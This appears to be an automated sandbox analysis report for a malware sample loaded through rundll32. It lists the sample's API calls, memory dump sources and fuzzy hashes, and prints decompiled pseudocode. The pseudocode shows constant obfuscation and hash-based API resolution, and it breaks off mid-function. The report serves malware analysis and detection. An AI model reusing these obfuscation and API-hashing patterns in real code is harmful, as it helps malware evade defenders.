                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$CreateDestroy
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3296620671-0
                                                                                                                                                            • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                                            • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                                                            • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                                            • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 260 10001aa0-10001aa2 249->260 261 10001aa4-10001ac9 VirtualAlloc 249->261 253 10001a2c-10001a4e VirtualAlloc 250->253 254 10001a7e 250->254 257 10001a50-10001a52 253->257 258 10001a57-10001a7b call 100017c0 253->258 254->246 257->251 258->254 260->251 263 10001acb-10001acd 261->263 264 10001acf-10001afe call 10001810 261->264 263->251 264->248
                                                                                                                                                            APIs
                                                                                                                                                            • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                                                            • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                            • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                                            • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                                                            • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                                            • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 275 377f5d-377ff1 call 3820b9 call 38aa30 CreateProcessW
                                                                                                                                                            APIs
                                                                                                                                                            • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0037AD99,?,?,?,181C8C04,0037AD99), ref: 00377FEB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                            • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                                            • Instruction ID: 0e077f6d55c0fc79e9b05ece8147445b89fe0ba675fe17c1794b1ecc8317ded7
                                                                                                                                                            • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                                            • Instruction Fuzzy Hash: E011D672402118BBDF62AFD1DD09CDF7F79EF093A4F145144F91925121D2768A60EBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 280 3846bb-38473b call 3820b9 call 38aa30 SHGetFolderPathW
                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                            			E003846BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                            				void* _t21;
                                                                                                                                                            				intOrPtr* _t25;
                                                                                                                                                            				void* _t26;
                                                                                                                                                            
                                                                                                                                                            				E003820B9(_t21);
                                                                                                                                                            				_v20 = 0x3f5bb0;
                                                                                                                                                            				_v16 = 0;
                                                                                                                                                            				_v12 = 0x996874;
                                                                                                                                                            				_v12 = _v12 << 0xf;
                                                                                                                                                            				_v12 = _v12 ^ 0xb43bad9d;
                                                                                                                                                            				_v8 = 0xebf0af;
                                                                                                                                                            				_v8 = _v8 ^ 0x3b7dcb24;
                                                                                                                                                            				_v8 = _v8 ^ 0x3b96d1fd;
                                                                                                                                                            				_t25 = E0038AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
                                                                                                                                                            				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
                                                                                                                                                            				return _t26;
                                                                                                                                                            			}











                                                                                                                                                            APIs
                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00384735
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FolderPath
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1514166925-0
                                                                                                                                                            • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                                            • Instruction ID: 09782a1b4ea3e555b4518fdc90f4ed0ac16dda0e58b05b4e3be04706e9bb403c
                                                                                                                                                            • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                                            • Instruction Fuzzy Hash: AF01EC75801218BBCF15AFD5DC498DFBFB8EF45394F108185F91866211D2758A60DBD1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 285 3793ed-379461 call 38aa30 ExitProcess
                                                                                                                                                            C-Code - Quality: 73%
                                                                                                                                                            			E003793ED() {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				void* _v24;
                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                            				intOrPtr _t24;
                                                                                                                                                            
                                                                                                                                                            				_v28 = 0xda6c64;
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				_v12 = 0x88a564;
                                                                                                                                                            				_v12 = _v12 | 0x9bf5ed5c;
                                                                                                                                                            				_v12 = _v12 ^ 0x9bf17c37;
                                                                                                                                                            				_v8 = 0xd9241f;
                                                                                                                                                            				_v8 = _v8 * 0x5c;
                                                                                                                                                            				_v8 = _v8 + 0xccdd;
                                                                                                                                                            				_v8 = _v8 + 0x903;
                                                                                                                                                            				_v8 = _v8 ^ 0x4e0c4bb2;
                                                                                                                                                            				E0038AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
                                                                                                                                                            				ExitProcess(0);
                                                                                                                                                            			}









                                                                                                                                                            APIs
                                                                                                                                                            • ExitProcess.KERNELBASE(00000000), ref: 0037945B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                            • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                                            • Instruction ID: 60a4d0680975cbf6830732f16911f82c1889d872f7ced8ab84c472361a29988a
                                                                                                                                                            • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                                            • Instruction Fuzzy Hash: CEF03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9DA04B7261E7745F459B91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 305 37b23c-37b2c6 call 3820b9 call 38aa30 lstrcmpiW
                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                            			E0037B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				void* _t27;
                                                                                                                                                            				int _t32;
                                                                                                                                                            
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t27);
                                                                                                                                                            				_v12 = 0x6268;
                                                                                                                                                            				_v12 = _v12 ^ 0x57e834c3;
                                                                                                                                                            				_v12 = _v12 + 0xffff2919;
                                                                                                                                                            				_v12 = _v12 + 0xffff3e3d;
                                                                                                                                                            				_v12 = _v12 ^ 0x57e9dc2b;
                                                                                                                                                            				_v8 = 0xa46433;
                                                                                                                                                            				_v8 = _v8 + 0x98ba;
                                                                                                                                                            				_v8 = _v8 | 0xc390ebe9;
                                                                                                                                                            				_v8 = _v8 + 0xd5b0;
                                                                                                                                                            				_v8 = _v8 ^ 0xc3bab866;
                                                                                                                                                            				E0038AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
                                                                                                                                                            				_t32 = lstrcmpiW(_a16, _a4); // executed
                                                                                                                                                            				return _t32;
                                                                                                                                                            			}








                                                                                                                                                            APIs
                                                                                                                                                            • lstrcmpiW.KERNELBASE(EE1E6DE5,57E9DC2B), ref: 0037B2C1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: lstrcmpi
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1586166983-0
                                                                                                                                                            • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                                            • Instruction ID: 990d1e94676dfe5714b5f3eca96472de2481dd2d6cd9bb128b4d258173c82d31
                                                                                                                                                            • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                                            • Instruction Fuzzy Hash: DC011AB2C04708FFDF45DFD4DD468AEBB75EB44304F108189B90566152E3754B609B51
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                            			E0038E395(signed int __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44) {
                                                                                                                                                            				signed int _v4;
                                                                                                                                                            				signed int* _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				signed int _v104;
                                                                                                                                                            				signed int _v108;
                                                                                                                                                            				signed int _v112;
                                                                                                                                                            				signed int _v116;
                                                                                                                                                            				signed int _v120;
                                                                                                                                                            				signed int _v124;
                                                                                                                                                            				signed int _v128;
                                                                                                                                                            				signed int _v132;
                                                                                                                                                            				signed int _v136;
                                                                                                                                                            				signed int _v140;
                                                                                                                                                            				signed int _v144;
                                                                                                                                                            				signed int _v148;
                                                                                                                                                            				signed int _v152;
                                                                                                                                                            				signed int _v156;
                                                                                                                                                            				signed int _v160;
                                                                                                                                                            				signed int _v164;
                                                                                                                                                            				signed int _v168;
                                                                                                                                                            				signed int _v172;
                                                                                                                                                            				signed int _v176;
                                                                                                                                                            				signed int _v180;
                                                                                                                                                            				signed int _v184;
                                                                                                                                                            				signed int _v188;
                                                                                                                                                            				signed int _v192;
                                                                                                                                                            				signed int _v196;
                                                                                                                                                            				signed int _v200;
                                                                                                                                                            				signed int _v204;
                                                                                                                                                            				signed int _v208;
                                                                                                                                                            				signed int _v212;
                                                                                                                                                            				signed int _v216;
                                                                                                                                                            				signed int _v220;
                                                                                                                                                            				signed int _v224;
                                                                                                                                                            				signed int _v228;
                                                                                                                                                            				signed int _v232;
                                                                                                                                                            				signed int _v236;
                                                                                                                                                            				signed int _v240;
                                                                                                                                                            				signed int _v244;
                                                                                                                                                            				signed int _v248;
                                                                                                                                                            				signed int _v252;
                                                                                                                                                            				signed int _v256;
                                                                                                                                                            				signed int _v260;
                                                                                                                                                            				signed int _v264;
                                                                                                                                                            				signed int _v268;
                                                                                                                                                            				signed int _v272;
                                                                                                                                                            				intOrPtr _v276;
                                                                                                                                                            				signed int _v280;
                                                                                                                                                            				signed int _v284;
                                                                                                                                                            				signed int _v288;
                                                                                                                                                            				signed int _t823;
                                                                                                                                                            				void* _t829;
                                                                                                                                                            				signed int* _t832;
                                                                                                                                                            				signed int _t833;
                                                                                                                                                            				signed int _t845;
                                                                                                                                                            				signed int _t858;
                                                                                                                                                            				signed int _t862;
                                                                                                                                                            				intOrPtr _t868;
                                                                                                                                                            				signed int _t888;
                                                                                                                                                            				void* _t939;
                                                                                                                                                            				void* _t948;
                                                                                                                                                            				signed int _t956;
                                                                                                                                                            				signed int _t957;
                                                                                                                                                            				signed int _t958;
                                                                                                                                                            				signed int _t959;
                                                                                                                                                            				signed int _t960;
                                                                                                                                                            				signed int _t961;
                                                                                                                                                            				signed int _t962;
                                                                                                                                                            				signed int _t963;
                                                                                                                                                            				signed int _t964;
                                                                                                                                                            				signed int _t965;
                                                                                                                                                            				signed int _t966;
                                                                                                                                                            				signed int _t967;
                                                                                                                                                            				signed int _t968;
                                                                                                                                                            				signed int _t969;
                                                                                                                                                            				signed int _t970;
                                                                                                                                                            				signed int _t971;
                                                                                                                                                            				signed int _t972;
                                                                                                                                                            				signed int _t973;
                                                                                                                                                            				signed int _t974;
                                                                                                                                                            				signed int _t975;
                                                                                                                                                            				signed int _t976;
                                                                                                                                                            				signed int _t977;
                                                                                                                                                            				signed int _t981;
                                                                                                                                                            				signed int _t984;
                                                                                                                                                            				signed int _t985;
                                                                                                                                                            				signed int* _t988;
                                                                                                                                                            				void* _t991;
                                                                                                                                                            
                                                                                                                                                            				_push(_a44);
                                                                                                                                                            				_v4 = __ecx;
                                                                                                                                                            				_push(_a40);
                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                            				_push(_a36);
                                                                                                                                                            				_push(_a32);
                                                                                                                                                            				_push(_a28);
                                                                                                                                                            				_push(_a24);
                                                                                                                                                            				_push(_a20);
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx & 0x0000ffff);
                                                                                                                                                            				E003820B9(__ecx & 0x0000ffff);
                                                                                                                                                            				_v284 = 0x99c43c;
                                                                                                                                                            				_t988 =  &(( &_v288)[0xd]);
                                                                                                                                                            				_v284 = _v284 + 0xbb14;
                                                                                                                                                            				_v284 = _v284 >> 0xb;
                                                                                                                                                            				_v284 = _v284 ^ 0x0000134f;
                                                                                                                                                            				_t862 = 0;
                                                                                                                                                            				_v120 = 0x27310;
                                                                                                                                                            				_t977 = 0x329d839;
                                                                                                                                                            				_t956 = 0x43;
                                                                                                                                                            				_v120 = _v120 / _t956;
                                                                                                                                                            				_v120 = _v120 + 0xe2f5;
                                                                                                                                                            				_v120 = _v120 ^ 0x0000ec43;
                                                                                                                                                            				_v36 = 0x50046c;
                                                                                                                                                            				_v36 = _v36 << 1;
                                                                                                                                                            				_v36 = _v36 ^ 0x00a00810;
                                                                                                                                                            				_v116 = 0x7f268a;
                                                                                                                                                            				_v116 = _v116 ^ 0x5f915552;
                                                                                                                                                            				_t957 = 0x1b;
                                                                                                                                                            				_v276 = 0;
                                                                                                                                                            				_v116 = _v116 * 0x3e;
                                                                                                                                                            				_v116 = _v116 ^ 0x3bc08e50;
                                                                                                                                                            				_v228 = 0xb299e8;
                                                                                                                                                            				_v228 = _v228 >> 0xe;
                                                                                                                                                            				_v228 = _v228 << 0x10;
                                                                                                                                                            				_v228 = _v228 * 0x42;
                                                                                                                                                            				_v228 = _v228 ^ 0xb8144000;
                                                                                                                                                            				_v64 = 0x620921;
                                                                                                                                                            				_v64 = _v64 | 0xbe88b167;
                                                                                                                                                            				_v64 = _v64 ^ 0xbeaab967;
                                                                                                                                                            				_v172 = 0xae09b0;
                                                                                                                                                            				_v172 = _v172 | 0xde677f7d;
                                                                                                                                                            				_v172 = _v172 ^ 0xc5d04777;
                                                                                                                                                            				_v172 = _v172 ^ 0x1b3b388a;
                                                                                                                                                            				_v132 = 0xc06abb;
                                                                                                                                                            				_v132 = _v132 ^ 0x2b7b17d1;
                                                                                                                                                            				_v132 = _v132 / _t957;
                                                                                                                                                            				_v132 = _v132 ^ 0x059ea5d4;
                                                                                                                                                            				_v236 = 0x9fdac6;
                                                                                                                                                            				_v236 = _v236 >> 4;
                                                                                                                                                            				_v236 = _v236 + 0x9b65;
                                                                                                                                                            				_v236 = _v236 * 0x7b;
                                                                                                                                                            				_v236 = _v236 ^ 0x051f8b2b;
                                                                                                                                                            				_v108 = 0xc74878;
                                                                                                                                                            				_v108 = _v108 + 0x314b;
                                                                                                                                                            				_v108 = _v108 * 0x41;
                                                                                                                                                            				_v108 = _v108 ^ 0x32a5e883;
                                                                                                                                                            				_v196 = 0x1587ec;
                                                                                                                                                            				_v196 = _v196 ^ 0x07496474;
                                                                                                                                                            				_v196 = _v196 >> 7;
                                                                                                                                                            				_t958 = 0x2c;
                                                                                                                                                            				_v196 = _v196 / _t958;
                                                                                                                                                            				_v196 = _v196 ^ 0x000054ad;
                                                                                                                                                            				_v244 = 0xbebf62;
                                                                                                                                                            				_v244 = _v244 << 0xb;
                                                                                                                                                            				_v244 = _v244 + 0xffffca16;
                                                                                                                                                            				_v244 = _v244 << 0xe;
                                                                                                                                                            				_v244 = _v244 ^ 0x36858000;
                                                                                                                                                            				_v72 = 0x750de5;
                                                                                                                                                            				_v72 = _v72 | 0xb336b270;
                                                                                                                                                            				_v72 = _v72 ^ 0xb377bff5;
                                                                                                                                                            				_v256 = 0xc175fb;
                                                                                                                                                            				_t984 = 0x72;
                                                                                                                                                            				_t959 = 0x28;
                                                                                                                                                            				_v256 = _v256 * 0x26;
                                                                                                                                                            				_v256 = _v256 >> 5;
                                                                                                                                                            				_v256 = _v256 ^ 0xfb5a89da;
                                                                                                                                                            				_v256 = _v256 ^ 0xfbbf3581;
                                                                                                                                                            				_v76 = 0x1a7820;
                                                                                                                                                            				_v76 = _v76 | 0xb8d3f172;
                                                                                                                                                            				_v76 = _v76 ^ 0xb8dbf96d;
                                                                                                                                                            				_v224 = 0x97ff87;
                                                                                                                                                            				_v224 = _v224 / _t984;
                                                                                                                                                            				_v224 = _v224 >> 6;
                                                                                                                                                            				_v224 = _v224 * 0x5d;
                                                                                                                                                            				_v224 = _v224 ^ 0x0001effe;
                                                                                                                                                            				_v40 = 0x7c0450;
                                                                                                                                                            				_v40 = _v40 / _t959;
                                                                                                                                                            				_v40 = _v40 ^ 0x000319b6;
                                                                                                                                                            				_v136 = 0x260fad;
                                                                                                                                                            				_v136 = _v136 + 0x622a;
                                                                                                                                                            				_t960 = 0x1c;
                                                                                                                                                            				_v136 = _v136 / _t960;
                                                                                                                                                            				_v136 = _v136 ^ 0x00015e7e;
                                                                                                                                                            				_v288 = 0x61f743;
                                                                                                                                                            				_t961 = 0x66;
                                                                                                                                                            				_v288 = _v288 * 0x25;
                                                                                                                                                            				_v288 = _v288 ^ 0x0e2ee817;
                                                                                                                                                            				_v288 = 0x858eca;
                                                                                                                                                            				_v288 = _v288 / _t984;
                                                                                                                                                            				_v288 = _v288 ^ 0x0002de1a;
                                                                                                                                                            				_v280 = 0xcba1b8;
                                                                                                                                                            				_v280 = _v280 / _t961;
                                                                                                                                                            				_v280 = _v280 ^ 0xc2211053;
                                                                                                                                                            				_v280 = _v280 + 0xffff75b7;
                                                                                                                                                            				_v280 = _v280 ^ 0xc2279606;
                                                                                                                                                            				_v288 = 0x614b46;
                                                                                                                                                            				_v288 = _v288 >> 4;
                                                                                                                                                            				_v288 = _v288 ^ 0x000cf9c3;
                                                                                                                                                            				_v288 = 0x794624;
                                                                                                                                                            				_v288 = _v288 + 0xb4d0;
                                                                                                                                                            				_v288 = _v288 ^ 0x0072cd5b;
                                                                                                                                                            				_v288 = 0xcdbe83;
                                                                                                                                                            				_v288 = _v288 >> 0xf;
                                                                                                                                                            				_v288 = _v288 ^ 0x00034ad6;
                                                                                                                                                            				_v288 = 0x24639d;
                                                                                                                                                            				_t962 = 0x28;
                                                                                                                                                            				_v288 = _v288 / _t962;
                                                                                                                                                            				_v288 = _v288 ^ 0x000e4507;
                                                                                                                                                            				_v288 = 0x4730ec;
                                                                                                                                                            				_t963 = 0x21;
                                                                                                                                                            				_v288 = _v288 / _t963;
                                                                                                                                                            				_v288 = _v288 ^ 0x0002fb4b;
                                                                                                                                                            				_v284 = 0xb301d9;
                                                                                                                                                            				_t964 = 0x4e;
                                                                                                                                                            				_v284 = _v284 / _t964;
                                                                                                                                                            				_v284 = _v284 + 0x8c1d;
                                                                                                                                                            				_v284 = _v284 ^ 0x00061f34;
                                                                                                                                                            				_v280 = 0xfdcbf7;
                                                                                                                                                            				_v280 = _v280 + 0x27a;
                                                                                                                                                            				_v280 = _v280 + 0xffff891b;
                                                                                                                                                            				_t965 = 0x46;
                                                                                                                                                            				_v280 = _v280 / _t965;
                                                                                                                                                            				_v280 = _v280 ^ 0x0008575c;
                                                                                                                                                            				_v284 = 0xc1d3a0;
                                                                                                                                                            				_v284 = _v284 >> 0xc;
                                                                                                                                                            				_v284 = _v284 << 2;
                                                                                                                                                            				_v284 = _v284 ^ 0x000b0f76;
                                                                                                                                                            				_v112 = 0xeee25;
                                                                                                                                                            				_v112 = _v112 << 0xc;
                                                                                                                                                            				_v112 = _v112 << 4;
                                                                                                                                                            				_v112 = _v112 ^ 0xee2c14e7;
                                                                                                                                                            				_v180 = 0x8a49b3;
                                                                                                                                                            				_v180 = _v180 | 0xb0d6dc69;
                                                                                                                                                            				_v180 = _v180 + 0xffffa02a;
                                                                                                                                                            				_v180 = _v180 | 0x7fd27f38;
                                                                                                                                                            				_v180 = _v180 ^ 0xffd81443;
                                                                                                                                                            				_v152 = 0x628374;
                                                                                                                                                            				_v152 = _v152 >> 2;
                                                                                                                                                            				_v152 = _v152 + 0xffff73d9;
                                                                                                                                                            				_t966 = 0x2e;
                                                                                                                                                            				_v152 = _v152 / _t966;
                                                                                                                                                            				_v152 = _v152 ^ 0x0001ef4a;
                                                                                                                                                            				_v28 = 0xe4a1af;
                                                                                                                                                            				_v28 = _v28 + 0x32bc;
                                                                                                                                                            				_v28 = _v28 ^ 0x00ec33da;
                                                                                                                                                            				_v160 = 0x595a50;
                                                                                                                                                            				_v160 = _v160 + 0xffffdbfa;
                                                                                                                                                            				_v160 = _v160 + 0xffffb344;
                                                                                                                                                            				_t967 = 0x36;
                                                                                                                                                            				_v160 = _v160 / _t967;
                                                                                                                                                            				_v160 = _v160 ^ 0x0006861f;
                                                                                                                                                            				_v88 = 0x4d7ad3;
                                                                                                                                                            				_v88 = _v88 + 0xc28a;
                                                                                                                                                            				_v88 = _v88 ^ 0x004ca34c;
                                                                                                                                                            				_v48 = 0xf1782b;
                                                                                                                                                            				_v48 = _v48 ^ 0xe8a77c51;
                                                                                                                                                            				_v48 = _v48 ^ 0xe85593aa;
                                                                                                                                                            				_v100 = 0x42ea8e;
                                                                                                                                                            				_t985 = 0x2a;
                                                                                                                                                            				_v100 = _v100 / _t985;
                                                                                                                                                            				_v100 = _v100 ^ 0x000caa85;
                                                                                                                                                            				_v148 = 0xa48e68;
                                                                                                                                                            				_t968 = 6;
                                                                                                                                                            				_v148 = _v148 / _t968;
                                                                                                                                                            				_v148 = _v148 << 0xc;
                                                                                                                                                            				_v148 = _v148 ^ 0xb6d58e9e;
                                                                                                                                                            				_v252 = 0x4ff2e7;
                                                                                                                                                            				_t969 = 0xc;
                                                                                                                                                            				_v252 = _v252 / _t969;
                                                                                                                                                            				_v252 = _v252 << 6;
                                                                                                                                                            				_v252 = _v252 << 0xc;
                                                                                                                                                            				_v252 = _v252 ^ 0xa6466867;
                                                                                                                                                            				_v80 = 0x4d7637;
                                                                                                                                                            				_v80 = _v80 + 0xd199;
                                                                                                                                                            				_v80 = _v80 ^ 0x004dfa45;
                                                                                                                                                            				_v24 = 0xfee4b3;
                                                                                                                                                            				_t970 = 0x3e;
                                                                                                                                                            				_v24 = _v24 * 0x23;
                                                                                                                                                            				_v24 = _v24 ^ 0x22d37c34;
